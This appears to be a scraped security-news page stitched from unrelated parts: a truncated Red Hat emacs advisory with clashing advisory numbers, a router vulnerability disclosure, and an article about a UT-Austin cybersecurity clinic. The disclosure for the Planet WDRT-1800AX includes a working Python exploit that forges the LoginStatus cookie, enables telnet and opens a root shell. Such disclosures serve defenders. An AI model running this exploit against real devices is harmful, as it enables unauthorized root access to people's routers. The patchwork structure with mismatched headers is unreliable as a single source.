elR4I4iFzXR0lh5Bh5z3f94eJidP64A/TM/c/pYKvYIYwIAhDNNl/tsQoANvfKUR  
mKL2artE8gWHQEdiWTGyhdPIXvzhOtC++VQ8m4lZTQHJ9JwEJO4iRntuOpH9CKsZ  
EOnWv6R7NRtI5cJrmnGi/5RGq4zwHTkinVrGZ7LUlxTMSgQCIbC9wFLZjNUJsgEw  
NbI7hFBKbFIoQnGruy2DyKHOVQADz094IkiGdG6p0lL2a31PKSkkSrSsYJdK9heh  
JtPA3mGEuPd+h9i4OcfbRI/jdStJU+UiQSICfO8gS3D4Bf9J8o5jz5rAN41quAqD  
n/BDsgD9Uqw7TfuSOz2b0+oK4nemIZFMUHMAMiyIqqmQ0pZ9NjdvRHXR2m3oW1fN  
VaX8pojSp4KnorwSVhthCgggJigH5ybUIMxGC+IKoOeUfdLD+q27JSFO6LmHBism  
9Inm1Pq7/0K/ziwbmNp5Am9OdK+AKOFuxw3vV9Ib67DK6ORmYQ/0x0QfiXAuYnAK  
OmHTGAMzJH4=  
=3H1J  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3517-01

Red Hat Security Advisory 2023-3481-01 - GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language, and the capability to read e-mail and news. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: emacs security update  
Advisory ID:       RHSA-2023:3481-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3481  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-48339   
=====================================================================

1. Summary:

An update for emacs is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch  
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

3. Description:

GNU Emacs is a powerful, customizable, self-documenting text editor. It  
provides special code editing features, a scripting language (elisp), and  
the capability to read e-mail and news.

Security Fix(es):

* emacs: command injection vulnerability in htmlfontify.el (CVE-2022-48339)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2171989 - CVE-2022-48339 emacs: command injection vulnerability in htmlfontify.el

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
emacs-24.3-23.el7_9.1.src.rpm

noarch:  
emacs-filesystem-24.3-23.el7_9.1.noarch.rpm

x86_64:  
emacs-24.3-23.el7_9.1.x86_64.rpm  
emacs-common-24.3-23.el7_9.1.x86_64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.x86_64.rpm  
emacs-nox-24.3-23.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
emacs-el-24.3-23.el7_9.1.noarch.rpm  
emacs-terminal-24.3-23.el7_9.1.noarch.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
emacs-24.3-23.el7_9.1.src.rpm

noarch:  
emacs-filesystem-24.3-23.el7_9.1.noarch.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
emacs-el-24.3-23.el7_9.1.noarch.rpm  
emacs-terminal-24.3-23.el7_9.1.noarch.rpm

x86_64:  
emacs-24.3-23.el7_9.1.x86_64.rpm  
emacs-common-24.3-23.el7_9.1.x86_64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.x86_64.rpm  
emacs-nox-24.3-23.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
emacs-24.3-23.el7_9.1.src.rpm

noarch:  
emacs-filesystem-24.3-23.el7_9.1.noarch.rpm

ppc64:  
emacs-24.3-23.el7_9.1.ppc64.rpm  
emacs-common-24.3-23.el7_9.1.ppc64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.ppc64.rpm  
emacs-nox-24.3-23.el7_9.1.ppc64.rpm

ppc64le:  
emacs-24.3-23.el7_9.1.ppc64le.rpm  
emacs-common-24.3-23.el7_9.1.ppc64le.rpm  
emacs-debuginfo-24.3-23.el7_9.1.ppc64le.rpm  
emacs-nox-24.3-23.el7_9.1.ppc64le.rpm

s390x:  
emacs-24.3-23.el7_9.1.s390x.rpm  
emacs-common-24.3-23.el7_9.1.s390x.rpm  
emacs-debuginfo-24.3-23.el7_9.1.s390x.rpm  
emacs-nox-24.3-23.el7_9.1.s390x.rpm

x86_64:  
emacs-24.3-23.el7_9.1.x86_64.rpm  
emacs-common-24.3-23.el7_9.1.x86_64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.x86_64.rpm  
emacs-nox-24.3-23.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
emacs-el-24.3-23.el7_9.1.noarch.rpm  
emacs-terminal-24.3-23.el7_9.1.noarch.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
emacs-24.3-23.el7_9.1.src.rpm

noarch:  
emacs-filesystem-24.3-23.el7_9.1.noarch.rpm

x86_64:  
emacs-24.3-23.el7_9.1.x86_64.rpm  
emacs-common-24.3-23.el7_9.1.x86_64.rpm  
emacs-debuginfo-24.3-23.el7_9.1.x86_64.rpm  
emacs-nox-24.3-23.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
emacs-el-24.3-23.el7_9.1.noarch.rpm  
emacs-terminal-24.3-23.el7_9.1.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-48339  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH9z5tzjgjWX9erEAQh4dRAAiKIWNjgNVzpQdHCrf8gFe0/zeh8iwKOK  
jRufnUymiOn1cv0Zk8Yf0F6QFAg6OFsnhI67zjb0wjXTCbtEELEk+PXj7LWOMxda  
o3z2hlaz/pNqI6XANgMN6GkxUuORfqdwV4zgP3qq0s9hdptzIQEFCvXU+c9antfs  
mDqWQdqZULXKRqmqZsV+FY/GoCOiXR30w4MSGd12qFCcB06MvnYcamvKwhWlXBGl  
s45DdVMuv0W7IRxlj2mwd+1wDI5oSPSuH7Dj3yHsD3B51Is5Ip5fR01fXUg3K/CL  
QKv7tXA5SvvEeZj1aLJld+Ja0X7ArOYcAqVUJNyRx8c3IMUe1eXRpjU38Q1G+5oa  
afIWx+YtydYN/CzrgXvfxwE1pT3MLiRZVYeCY9+3qYdRN6bUwEbMDubpXyB74iCn  
EJeO26l3KuS4Kz8bHxdUOXEaX+NhROeaYE8VpYiUGg86JpU4WLDTkZjth+hxRTxN  
uUNYwQs+FH9YD5OgoQRNSxJSImDhxcfPdbEJQKCH8ojXjGC7rJoJZSMpMzXiPMTc  
tA+n+eKkSs+cIzYl4IARX+MzhjWaMWw+VKEsSO3SeAfkNeWvN2hrHVwzYXO0BSHc  
Mjmzzo/GV8gofa4SDZp+LrdJ3BUnCuwGRaKjDTIGdjuDHBIkDNoMimBTjQ3R/Ti1  
ZHjYLAN9USg=  
=oqzK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3481-01

An issue in Planet Technologies WDRT-1800AX v1.01-CP21 allows attackers to bypass authentication and escalate privileges to root via manipulation of the LoginStatus cookie.

**Planet Technologies WDRT-1800AX Authentication Bypass Vulnerability .**

Affected Device: WDRT-1800AX

Affected Firmware: v1.01-CP21

Description:

    The PLANET technologies 1800AX router runs a web service vulnerable to trivial authentication bypass.
    The bypass can be combined with a telnet weakness leading to a root shell on the device. 
    The router runs a minimal lighttpd binary to support a collection of JavaScript and html files which create requests to a 'cdata.cgi' binary.
    This 32bit MIPS compiled binary supports the core functionality of the web service however uses a standard cookie to determine authenticated status. 
    

**Details**

The WDRT-1800AX router from PLANET technologies uses a pre-set, boolean cookie for determining authentication to the web management pages. The cookie 'LoginStatus' is created when a user attempts to login to the login form hosted by a CGI binary running via Lighttpd.

By simply replacing false to true, a user can bypass the need to supply the password to the web form, and instead access all administration functions of the device, including but not limited to; password resets, configuration downloads and enabling telnet.

Due to the router in its default configuration not having a password for the root user, when a user attempts to login to the telnet service as root, it simply supplies a session.

With a basic proof of concept, any lan-adjacent attacker can gain root access to the device without needing the appropriate passwords to the service(s). An example can be found below to enable the telnet service and interact with it.

import requests, telnetlib, sys
host \= sys.argv\[1\]
url \= 'http://'+host+'/cgi-bin/cdata.cgi'

cookies \= {'LoginStatus':'true'}

headers \= {
   'User-Agent': 'Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0',
   'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
}
\# doesnt check if its already enabled, just tries to enable it. 
data \= {
   'operation': 'DevManagement',
   'opt': 'telnet',
   'telnet': '1',
}

user \= "root"
print("enabling telnet")

req \= requests.post(url, headers\=headers,data\=data)

if req.text != '{ "err": 0 }':
   print("failed")

tn \= telnetlib.Telnet(host, 23)
if (tn):
   print("connecting to session")
   tn.read\_until(b"login: ")
   tn.write(user.encode('ascii') + b"\\n")
   tn.interact()

**Disclosure**

13/2/23 - Issue identified, pocs created and reported via support page  
13/2/23 - Vendor reply asking for further information  
13/2/23 - Send python proof of concepts and expanded the explaination  
15/2/23 - Vendor reply confirming the behavior, estimating a fixed release in Q2 2023.  
07/04/23 - Vendor pushed updated firmware  
05/05/23 - Advisory released  

**Extra notes**

When I was first looking into the web app running in QEMU, I figured that the option to change the language to English was broken since the management option was set but not rendering. This was until I realised that the English language JavaScript file wasn't ever being included in the pre-set html pages, renaming the lang_en.js to lang_zh.js and clearing browser cache allowed the page to render without having to translate everything manually. :)

CVE-2023-33553: poc/WDRT-1800AX.md at main · 0xfml/poc

UT-Austin will join a growing movement to launch cybersecurity clinics for cities and small businesses that often fall through the cracks.

The idea for the UT-Austin project emerged from discussions in CISA’s Cybersecurity Advisory Committee, a group of experts from the private sector, academia, civil society, and local government. During conversations about a university running a municipal cyber helpline, Austin quickly emerged as the ideal candidate, thanks to its already popular 311 service and the support of two committee members: Steve Adler, who was then Austin’s mayor, and Chesney, an influential UT faculty member.

CISA director Jen Easterly has championed the project and recently told the advisory committee that her agency will consider launching a nationwide cyber 311 system after evaluating Austin’s new clinic and similar efforts.

“The UT-Austin pilot is helping us better understand how we can provide cybersecurity services for small and medium-size businesses across our nation,” Easterly says in a statement, adding that she is “truly excited” about it.

Building a Clinic

UT-Austin’s clinic will take the form of a two-semester course. In the fall, Francesca Lockhart, a former top Texas homeland security official Chesney recruited to lead the project, will teach students cybersecurity skills and partner them with local organizations and businesses, giving students time to learn how those organizations operate and what they need. In the spring, teams of students will then create and implement cybersecurity improvement plans for their clients.

Lockhart’s curriculum will cover lessons like inventorying the devices on a network, scanning for and fixing known vulnerabilities, configuring a firewall, conducting penetration testing, and understanding the Linux operating system and the Python programming language, which are widely used in diagnosing and fixing security issues. 

The 20 people in the inaugural class include students majoring in business and computer science, but also those studying biochemistry and international relations. Lockhart is still evaluating a variety of potential clients, including small businesses; nonprofits serving vulnerable populations in Austin; neighboring school districts and city governments; and startups focused on fighting hunger, disease, and other social ills.

Lockhart says the clinic represents “a great opportunity to get students real-world career experience and fill the cybersecurity workforce gap while also serving the needs of some of these under-resourced organizations.”

Any expansion to a 311-type service is far off. “You need to walk before you run,” Chesney says.

Expanding the Scope

To Steve Adler, Austin’s former mayor, a cyber helpline would be a natural extension of the UT-Austin project.

Austin’s 311 service already gets calls from people worried about phishing scams and other low-level cyberattacks. The next step would be to create a referral system so 311 operators could turn certain calls over to UT-Austin students trained to handle a wide range of common incidents. “It might expand the scope of what people think would be covered by a 311 call,” says Adler, who served as mayor from 2015 to 2023.

Another state is already forging ahead with this idea. Later this year, Bridgewater State University in Massachusetts will launch a security operations center (SOC) to answer emergency calls from the community. The 24/7 SOC, created in partnership with a state-funded consortium, will be staffed by professional cyber experts, but students will be able to observe and participate in their work.

Tag

#linux